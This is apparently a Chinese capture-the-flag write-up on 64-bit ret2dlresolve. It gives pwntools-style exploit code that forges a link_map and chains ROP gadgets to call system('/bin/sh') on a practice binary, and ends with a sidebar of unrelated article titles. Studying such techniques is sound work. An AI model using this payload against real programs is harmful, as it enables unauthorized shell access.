ret2dl64
2024-09-08 08:52:26
ret2dl64
ret2dl64 与ret2dl32不同,ret2dl64需要知道libc。
检查保护:
IDA看一看
read_got 被置为0,强制你使用ret2dlresolve。
我们先伪造link_map,然后让程序去执行我们伪造的link_map,执行system('/bin/sh')。
首先我们需要恢复read函数的got表,方法就是布置好参数跳转到plt0重新解析read函数。
bin_sh = fake_link_map_addr + 0x78
payload = fake_link_map
payload = payload.ljust(0x118,'\x00')
payload += p64(pop_rdi_ret)+p64(0)+p64(pop_rsi_r15_ret)+p64(0x0600E10)+p64(0)+p64(0x400406) #恢复read_got的内容
payload += p64(pop_rdi_ret) + p64(bin_sh)+p64(ret)+ p64(plt_load) + p64(fake_link_map_addr) + p64(0)#通过fake_link_map调用system('/bin/sh')
我们再来看看fake_link_map
l_addr = libc.sym['system'] - libc.sym['read']
r_offset = buf - l_addr #保证buf为可读可写就可以了
#负数需要补码
if l_addr < 0:
l_addr = l_addr + 0x10000000000000000
fake_link_map_addr = buf
fake_dyn_strtab_addr = fake_link_map_addr + 0x8
fake_dyn_symtab_addr = fake_link_map_addr + 0x18
fake_dyn_rel_addr = fake_link_map_addr + 0x28
fake_link_map = p64(l_addr)
fake_link_map += p64(0) + p64(dynstr) #fake_dyn_strtab : fake_link_map_addr + 0x8
fake_link_map += p64(0) + p64(read_got - 0x8) #fake_dyn_symtab : fake_link_map_addr + 0x18
fake_link_map += p64(0) + p64(fake_link_map_addr + 0x38) #fake_dyn_rel : fake_link_map_addr + 0x28
fake_link_map += p64(r_offset) + p64(0x7) + p64(0) #fake_rel : fake_link_map_addr + 0x38
fake_link_map = fake_link_map.ljust(0x68,'\x00')
fake_link_map += p64(fake_dyn_strtab_addr)#dyn_strtab的指针
fake_link_map += p64(fake_dyn_symtab_addr) #dyn_strsym的指针 : fake_link_map_addr + 0x70
fake_link_map += '/bin/sh\x00' #fake_link_map_addr + 0x78
fake_link_map = fake_link_map.ljust(0xF8,'\x00')
fake_link_map += p64(fake_dyn_rel_addr)#在fake_link_map_addr + 0xF8处,是rel.plt指针
最新文章
- net-force.nl/steganography writeup
- REVERSE
- 弱键(Weak Key, ACM/ICPC Seoul 2004, UVa1618)
- DML操作对索引的影响
- SQL Server int类型值最大2147483647(2^31 - 1)
- window.external.notify() 与 UglifyJS 压缩优化冲突
- 中文输入法在vs2010中失效解决方案
- Quartz1.8.5例子(九)
- android 签名被篡改(Keystore was tampered with, or password was incorrect)
- java.util.concurrent BlockingQueue
- Linux编程学习笔记(二)
- Spring 注解 @Scheduled(cron = ";0 0/10 * * * ? ";) 动态改变时间
- redis和memcache的区别(总结)
- linux配置防火墙
- 通过mapreduce把mysql的数据读取到hdfs
- input 文本框,对中文长度校验
- Vue.js绑定内联样式
- Eigen教程(8)
- js跨域请求数据的3种常用的方法
- RPC框架之Thrift分析(转)